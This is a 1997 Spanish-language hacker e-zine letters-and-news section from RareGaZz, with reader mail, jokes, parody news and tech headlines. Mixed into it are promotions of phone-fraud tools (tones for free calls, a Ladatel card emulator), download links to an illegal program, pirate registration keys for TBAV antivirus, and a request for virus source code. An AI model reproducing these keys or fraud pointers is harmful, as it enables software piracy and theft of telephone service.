[ Ahora solo una :-) la de la revista. ]
Telmex 4 Free esta ahorita demasiado Underground como para sacarlo a la luz...
Que hace este programa? solo lo he escuchado con ustedes...
xDAWN
xdawn@bigfoot.com
[ TELMEX 4 FREE AHH!!! ES LA GLORIA PARA TODO HACKER :-) ESCRITO ENTERAMENTE
POR NUESTROS AMIGOS DE RDK PERMITE HACER LLAMADAS GRATIS DESDE CUALQUIER
TELEFONO PRIVADO. Son tonos que hacen creer a la linea telefonica que
eres una repetidora de se¤ales por lo que te dejan marcar a cualquier
numero local gratis! Desgraciadamente RdK no quiso sacar ese programa
al publico :-( ahi se los pasaremos luego ... ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Como ustedes dijeron en la revista que se metian a yahoo chat me meti y
es una verdarera mierda si quieren un chat de verdad metanse en
www.venezuelanet.com y www.starmedia.com son lo suficientemente rapido
para conversar un buen rato.
ok ratas nos vemos.
Arkangel
[ Tienes razon, el chat de yahoo esta lleno de personas buscando cybersexo
y otras estupideces. Pero recuerda que nosotros dijimos que lo usabamos
por su excepcional rapidez (instalando el plugin) no por su ambiente. ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
SE PASARON CON INTERHAK!!! QUIEN LO HIZO? COMO LO HIZO? PERMITIRA ENTRAR
A INTERNET EN OTRAS CIUDADES?
[ Me suenas a NARC! Quieres saber mucho sobre un programa ilegal y eso no
es bueno chamaco. Si ustedes no tienen su copia de Interhak podran bajarla
en los proximos 5 dias despues de que haya salido esta revista unicamente
en el siguiente link: http://www.geocities.com/Baja/4426/interhak.zip
Si ya no lo encuentras, entonces es demasiado tarde :-) ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Razon numero uno para temer a la tecnologia:
o o o o o o> o o o o o o o
^|\ ^|^ v|^ ^|^ |/v \ x </ <|> <|> v|v |/v x|x
/\ >\ /< >\ /< /< >\ /< >\ /< >\ /< >\
<o <o> o o o o o
\| | <|> </> <\> <)> |\ Mr. ASCII baila Macarena :-)
/< >\ >\ /< >\ >> L
[ Se autoriza el posteado de este arte ASCII en cualquier BBS mencionando
que se obtuvo de esta revista ok? killerbot ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
P1 : De donde puedo conseguir versiones actualizadas de Linux
(Gratis)??????
Monra
[ En el siguiente link www.redhat.com parece estar disponible la version
mas nueva 4.02. Linux es un gran sistema para PC pero es muy dificil
configurarlo correctamente. Estos lugares pueden ayudar a eso:
http://www.xinside.com
http://sunsite.unc.edu/pub/Linux
http://www.singnet.com.sg/~sunsurf
http://www.caldera.com/linux_info.html
PARA LOS MAQUEROS AQUI TIENEN EL LINK PARA BAJAR LINUX!!
http://www.mklinux.apple.com ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Ya estoy registrado en la BBS leyenda1.com.mx !! Por fin podre mandar los
Express ;-) Ahi los veo, soy raretrip y mi nick en la BBS es curiosamente,
raretrip. Mientras andaba por ahi me encontre este Post de Scorpio:
Nombre Horario telefono
Dark Comm aXs 21-08hrs 583-6655
Death Star 22-07hrs 567-5242
Laberinto 24.hrs. 5500891
Son BBS del Distrito Federal que ESTAN EN LINEA en estos momentos. raretrip
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Algunos de ustedes tiene TBAV para Windows 95 o Dos y desean registrarlo?
Entonces diriganse hacia donde aparezca Help, About y eligan Register.
Las claves son las siguientes para Tbav Windows 95
Nombre: raregazz
Clave1: 14a3e02a
Clave2: 6f234484
Clave3: 819feb9f
Clave4: acc2f4b5
Clave5: 66ffffc2
Nombre: raredude
Clave1: 0998EF3F
Clave2: 99999999
Clave3: 99999999
Clave4: 99999999
Clave5: 4C99FF58
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
APENAS ENCONTRE SU REVISTA, YO SOY REALMENTE NUEVO EN LA INTERNET(COMO 6
MESES), PERO E VAGADO Y DESDE QUE ENCONTRE LOS GRUPOS DE HACKERS ME HE
METIDO MUCHO EN EL TEMA. SU REVOISTA ES LA MEJOR QUE HE LEIDO(Y ESO QUE
E LEIDO CASI TODAS), INCLUSO SON MUY SUPERIORES A LAS ESPA¥OLAS. Y
AUNQUE MI TIRADA ES MAS POR LA MAMADA DE LOS VIRUS, CREO QUE SU REVISTA
ES LA MAS COMPLETA, POR CIERTO EN UN NUMERO SALE LA DESCRIPCION DEL
VIRUS "Zhengxl", Y E ESTADO BUSCANDO EL CODIGO EN ENSAMBALDOR DE ESTE
VIRUS(A MI ME ENCANTA ANALISAR LOS CODIGOS EN ENSABLADOR), ASI QUE SI
SABEN DONDE LO PUEDO CONSEGUIR SE LES AGRADESERIA QUE ME LO HICIERAN
SABER. A POR CIERTO EN UNA DE SUS REVISTAS PIDEN ALGO PARA CHINGARSE A
TELMEX, PUES AQUI LES VA:
http://www.si-mexweb.com/mex-hack/spanish/tprom.zip
LA DIRECCION COMO VEN ES DE GILIGAN EL DE MEX-HACK, ESTA ES UNA TARJETA
PROM PARA SIMULAR UNA TARJETA LADATEL, SEGUN GILIGAN ESTA MADRE SI
FUNCIONA PERO NO LA HE PODIDO PROVAR YA QUE ME FALTA LA MEMORIA RAM QUE
NO HE PODIDO ENCONTRAR, PERO EN SI EL DOCUEMTO ESTA MUY INTERESANTE PARA
QUE LO ADICIONEN EN ALGUN NUMERO DE SU REVISTA.
POR OTRO NO CONOCEN HA NADIE DE POR ACA La tierra del tequila y el
mariachi (Gudalajara), QUE SE DEDIQUE AL HACKING, CRACKIN O A LOS VIRUS,
PARA FORMAR ALIANSAS POR ACA.
YA PARA CABAR, SIGAN COMO VAN Y NO VAYAN A DESAPARECER DE LA RED COMO
LES PASA A LOS HACKERS ESPA¥OLES, CHIDO RAZA Y SIGAN DANDO...
La informacion es conocimiento
y el saber nos hace libres.
ATTTEEENNTTAMMENTTE
VoV_77
P.D. Aqui les va algo que me encontre por la red.
Cliente: "Estoy corriendo Windows 95..."
Soporte Tecnico: "Si."
Cliente: "Mi computadora no esta funcionando."
Soporte Tecnico: "Si, eso ya me lo habia dicho."
[ El codigo del virus Zhengxi nosotros tambien lo hemos buscado sin suerte,
de hecho ni siquiera hemos podido encontrar el codigo compilado :-( Sabemos
que existe por las multiples rese¤as que hay en internet sobre el virus
pero por el momento el codigo no ha podido ser desensamblado. Sobre hackers
en Guadalajara conocemos algunos, si alguien quiere iniciar algo con VoV_77
por esos lares comuniquense con nosotros y se lo haremos saber. ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
[ Quisiera aclarar a todos los lectores que nos tratan de ayudar mandando
textos (en ingles) que la mayoria ya los tenemos. No se cual sea su
impresion de este e-zine pero nosotros NO somos simples traductores!
Ustedes pueden ayudar mas si en lugar de mandarnos textos en ingles para
que los incluyeramos en el mag, HICIERAN sus propios textos en espa¤ol
sobre lo que ustedes saben. Eso nos haria sentir mucho mejor que recibir
textos en ingles una y otra vez de distintas personas. ¨ Que sucede ?
ven a raregazz como una simple maquina traductora? Cada vez que hacen eso
nos desilusiona el pasar literalmente horas creando los textos para esta
revista. Explicar algo que ustedes sepan para una revista electronica
resulta demasiado facil y los alentamos a que lo hagan. Recuerden que no
todos saben lo mismo sobre i-net y otros programas como Mirc. No lo tomen
a mal, sepan sacar lo constructivo de este mensaje :-) KB ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> NotiLOONS <
~~~~~~~~~
"Noticias para el Interesado"
El nuevo Keyboard de Microsoft
Microsoft Corporation ha anunciado un nuevo Keyboard dise¤ado especialmente
para Windows. Aparte de las teclas encontradas en el standard keyboard, el
nuevo dise¤o de microsoft incluye varias nuevas teclas que haran tu
experiencia en la Pc mas divertida. Las teclas propuestas son:
1) GPF key-- Esta tecla generara inmediatamente un "General Protection Fault"
cuando sea presionada. Los representantes de microsoft han explicado que
el proposito de esa tecla es el eliminar la fastidiosa tarea de tener que
ejecutar un programa para producir un General Protection Fault.
2) $$ key-- Cuando esta tecla sea presionada, el dinero de tu cuenta bancaria
sera automaticamente depositado en la cuenta de microsoft sin la necesidad
de alguna otra accion o intervencion de terceras personas.
3) MS key-- Esta tecla ejecuta un comercial titulado "Computing for Mindless
Drones" en una ventana 1" x 1"
4) Chicago key-- Genera ninguna otra cosa que simples loops por meses...
5) IBM key-- Busca en tu disco sistemas operativos o aplicaciones realizadas
por otras compa¤ias que no sean microsoft y las elimina.
-|-|--|-|-|-|-|-|-|-|-|-|-|-|-|-|-|--|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|
MATTEL ANUNCIA lo mas nuevo en su nueva linea de productos Barbie, la
llamada "Hacker Barbie." Estas nuevas mu¤ecas seran sacadas a la venta
proximamente. La compa¤ia intenta desterrar los antiguos mitos sobre la
mujer como que no saben nada de computadoras, tienen fobia a los numeros y
que tienen incapacidades academicas.
Esta nueva linea de mu¤ecas Barbie viene equipada con su propia terminal
y documentacion UNIX asi como toda la serie arco-iris. El vestuario de la
Barbie consiste en una camisa de botones sucia y un par de jeans bastante
usados. Los accesorios incluyen un reloj CASIO y lentes tan gruesos que
podrian hacer fuego en las hormigas.
(Protectores de bolsillo y calculadoras HP opcionales.)
La nueva Barbie tiene la increible capacidad de pasarse en la pantalla
sin parpadear, comer o beber 16 horas seguidas. Su vocabulario consiste
principalmente en "Cual es tu direccion Internet", "Me gusta TCP/IP!",
"Tu Kernel esta da¤ado" y "Viva el CyberSex!".
"Estamos muy emocionados con este producto," dice Ken Olsen, Ejecutivo
de ventas. La compa¤ia designo como su compa¤ero KEN a un consultante
ejecutivo que frecuentemente pide ayuda tecnica a Barbie.
Los grupos feministas estan igualmente excitadas por esta nueva linea
de mu¤ecas.
Los padres -por otra parte- estan preocupados en que caeran detras de los
ni¤os cuando la mu¤eca salga al mercado. "My hija Jenny juega con su
mu¤eca todo el tiempo y dos dias fueron suficientes para que empezara a
pagar mis deudas de credito bancarias" Dice Carlson de Oxford, Mississipi
"No se como lo hace pero ciertamente lo hace. Lo unico que no quiero es
ser vista por mi hija como una madre tonta". Mattel ofrecera cursos de
entrenamiento gratuitos a los padres que compren la nueva Hacker Barbie.
La futura linea de Hacker Barbie incluira bastantes variaciones para
llenar los distintos aspectos de la cultura hacker. "Hacker Barbie va a
la Carcel" ense¤ara las eticas computacionales a los ni¤os, mientras
"B4RB13 32CR1B3 421" servira como una introduccion al tipo de escritura.
[ Articulo sobre "Hacker Barbie" de Phantasy Mag ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
** !NOTICIAS SERIAS! **
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Dragon Systems, un lider en el terreno de software para la recognicion de voz
a sacado a la venta su nuevo programa ($299) para reconocer voz continua, con
esta tecnologia uno podra hablarle a la computadora sin...tener...que...hacer
...pausas.
Jueces federales de EUA han mantenido derrotadas las propuestas contra
Internet como la ley de decencia de Nueva York que fue tachada de
anti-constitucional y otra ley de Georgia que proponia prohibir la navegacion
anonima por la red ha sido tambien derrotada.
American Online sufrio el viernes 20 de junio un ataque masivo de email
afectando a 500,000....Los hackers explotaron un BUG en el programa de
Microsoft "Microsoft Information Server". Un FIX esta disponible.
En la primera decision sobre Internet, la suprema corte de justicia a
declarado al "Communication Decency Act" como anti-constitucional.
2/julio/1997 - Si has tenido problemas cuando te diriges al website de
www.microsoft.com en esta semana, es debido al ataque que esta siendo sometido
este sitio por hackers desconocidos hasta la fecha que han estado negando con
exito el acceso a ese servidor. Este ataque resulta penoso ya que antier
Microsoft anuncio sus nuevos productos "firewall" (barreras de fuego).
El servidor de email anonimo HUGE.CAJONES.COM esta fuera de servicio!! Lo que
significa que el programa para enviar email anonimo de Raretrip REMAIL.ZIP
no sirve por el momento :-( Envia un mensaje a remailer@huge.cajones.com con
el subject remailer-help para saber si esta en linea.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ooo
$ $ oo Participa en esta revista y forma parte de la
" oo " $ gran familia de amigos de raregazz.
$ $ $ "
"o "o o" $ Todos aquellos que hayan incluido un link a
$o $ " " nuestra pagina usando alguno de nuestros logos
"$ $ $ $ hagan el favor de enviarnos un logo de su pagina
$$ $o " de tama¤o maximo 70x70 y maximo 5k. Esto es
ooo $ooo o $ para que su link en nuestra pagina se distinga
$ "$$o $ $ de los demas.
o""o "$ ""o $$
$ $ "$ $ $
$o $o $ " $ Hasta luego y les prometemos que el siguiente
$"o $""" o" numero traera aun mejores participaciones y mas
$ "" $ consejos y utilidades. raretrip
" $
"o $
$ $
""""""""
<<::RareGaZz::>>